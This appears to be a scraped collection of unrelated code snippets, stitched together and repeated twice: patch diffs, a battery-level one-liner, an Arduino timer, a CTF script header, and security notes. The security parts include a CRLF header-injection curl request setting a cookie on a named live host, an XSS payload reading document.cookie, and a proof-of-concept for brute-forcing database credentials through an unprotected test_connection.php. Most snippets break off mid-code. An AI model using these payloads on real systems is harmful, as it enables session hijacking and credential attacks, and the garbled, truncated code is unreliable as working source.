November 14, 2013 00:48 · December 18, 2013 14:14 · October 13, 2017 17:16 · April 8, 2014 15:12 · April 23, 2014 19:46 · August 29, 2015 14:04
 ( cd /sys/class/power_supply/BAT1/ && perl -e "printf(\"%%%d\n\",(( "`cat charge_now`" / "`cat charge_full`" ) * 100));" )
 --- postgresql/backup.pl.old    2013-12-17 14:50:06.000000000 -0300
 +++ postgresql/backup.pl        2013-12-17 16:25:52.000000000 -0300
 @@ -2,6 +2,7 @@
 # backup.pl
 # Called by cron to backup a database
 
 +my $compress;
 $no_acl_check++;
 require './postgresql-lib.pl';
 
 [cicatriz@localhost ~]$ curl -v 'http://go.unbounce.com/pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2=' -H 'Host: go.unbound.com' -H 'Accept: */*'
 * About to connect() to go.unbounce.com port 80 (#0)
 *   Trying 54.225.243.45...
 * connected
 * Connected to go.unbounce.com (54.225.243.45) port 80 (#0)
 > GET /pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2= HTTP/1.1
 > User-Agent: curl/7.27.0
 > Host: go.unbound.com
 > Accept: */*
 > 
 #!/usr/bin/perl -w
 # Pay TV (Category: Web) Author(s): qll, tangled
 # These robo-friends were shocked to see that they had to pay to watch the news
 # broadcast about the â€œOktoberfestâ€. Can you help them?
 # Here is your challenge: https://ctf.fluxfingers.net:1316/

 #use strict;
 use warnings;
 use LWP::UserAgent;
 use Data::Dumper;
 http://www.victim.com/ticket.php?track='),alert(document.cookie);//?&Refresh=36528&f=1
 HTTP/1.1 200 OK
 Server: test
 Content-Type: text/html; charset=UTF-8
 Date: Tue, 05 Aug 2014 14:42:52 GMT
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 Pragma: no-cache
 Content-Length: 13

 <h1>TEST</h1>
 (*) There isn't an access control in the file test_connection.php, which performs tests for MySQL connections (also POP3 and SMTP). This can give an attacker the opportunity to perform a dictionary bruteforce attack and check every possible combination of username/password and/or databases without having the need to make a real connection to the MySQL service.

 (*) proof-of-concept:

 curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed

 Where USERNAME, PASSWORD and DATABASE are parameters to bruteforce.
 --- /etc/init.d/puppet-dashboard.old    2015-03-19 11:36:46.000000000 -0300
 +++ /etc/init.d/puppet-dashboard        2015-03-19 11:39:45.000000000 -0300
 @@ -78,7 +78,13 @@
 
 restart () {
         stop
 -        start
 +       RETVAL=$?
 +       if [ $? -gt 0 ];then
 +               return $RETVAL
 // Simple boxing timer

 // turn on debug strings
 #define DEBUG true

 // leds
 int pingreen = 13;
 int pinred = 11;
 // buzzer
 int pinbuzz = 12;
 --- sarg_frame.php.old  2016-03-11 14:25:58.000000000 -0300
 +++ sarg_frame.php      2016-03-11 16:09:53.000000000 -0300
 @@ -34,6 +34,11 @@
        ini_set('memory_limit', '250M');
 }

 +// Small security check
 +if(!empty($_REQUEST['file'])){
 +       $_REQUEST['file']=preg_replace('/(\.+\/|\\\.*|\/{2,})*/',"", $_REQUEST['file']);
 +}
	--- postgresql/backup.pl.old 2013-12-17 14:50:06.000000000 -0300
	+++ postgresql/backup.pl 2013-12-17 16:25:52.000000000 -0300
	@@ -2,6 +2,7 @@
	# backup.pl
	# Called by cron to backup a database

	+my $compress;
	$no_acl_check++;
	require './postgresql-lib.pl';
	[cicatriz@localhost ~]$ curl -v 'http://go.unbounce.com/pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2=' -H 'Host: go.unbound.com' -H 'Accept: /'
	* About to connect() to go.unbounce.com port 80 (#0)
	* Trying 54.225.243.45...
	* connected
	* Connected to go.unbounce.com (54.225.243.45) port 80 (#0)
	> GET /pricing/clkn/http/%0dSet-Cookie:%20xxx=test;%20path=/;%20xxx2= HTTP/1.1
	> User-Agent: curl/7.27.0
	> Host: go.unbound.com
	> Accept: /
	>
	#!/usr/bin/perl -w
	# Pay TV (Category: Web) Author(s): qll, tangled
	# These robo-friends were shocked to see that they had to pay to watch the news
	# broadcast about the â€œOktoberfestâ€. Can you help them?
	# Here is your challenge: https://ctf.fluxfingers.net:1316/

	#use strict;
	use warnings;
	use LWP::UserAgent;
	use Data::Dumper;
	HTTP/1.1 200 OK
	Server: test
	Content-Type: text/html; charset=UTF-8
	Date: Tue, 05 Aug 2014 14:42:52 GMT
	Expires: Thu, 19 Nov 1981 08:52:00 GMT
	Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
	Pragma: no-cache
	Content-Length: 13

	<h1>TEST</h1>
	(*) There isn't an access control in the file test_connection.php, which performs tests for MySQL connections (also POP3 and SMTP). This can give an attacker the opportunity to perform a dictionary bruteforce attack and check every possible combination of username/password and/or databases without having the need to make a real connection to the MySQL service.

	(*) proof-of-concept:

	curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed

	Where USERNAME, PASSWORD and DATABASE are parameters to bruteforce.
	--- /etc/init.d/puppet-dashboard.old 2015-03-19 11:36:46.000000000 -0300
	+++ /etc/init.d/puppet-dashboard 2015-03-19 11:39:45.000000000 -0300
	@@ -78,7 +78,13 @@

	restart () {
	stop
	- start
	+ RETVAL=$?
	+ if [ $? -gt 0 ];then
	+ return $RETVAL
	// Simple boxing timer

	// turn on debug strings
	#define DEBUG true

	// leds
	int pingreen = 13;
	int pinred = 11;
	// buzzer
	int pinbuzz = 12;
	--- sarg_frame.php.old 2016-03-11 14:25:58.000000000 -0300
	+++ sarg_frame.php 2016-03-11 16:09:53.000000000 -0300
	@@ -34,6 +34,11 @@
	ini_set('memory_limit', '250M');
	}

	+// Small security check
	+if(!empty($_REQUEST['file'])){
	+ $_REQUEST['file']=preg_replace('/(\.+\/\|\\\.\|\/{2,})/',"", $_REQUEST['file']);
	+}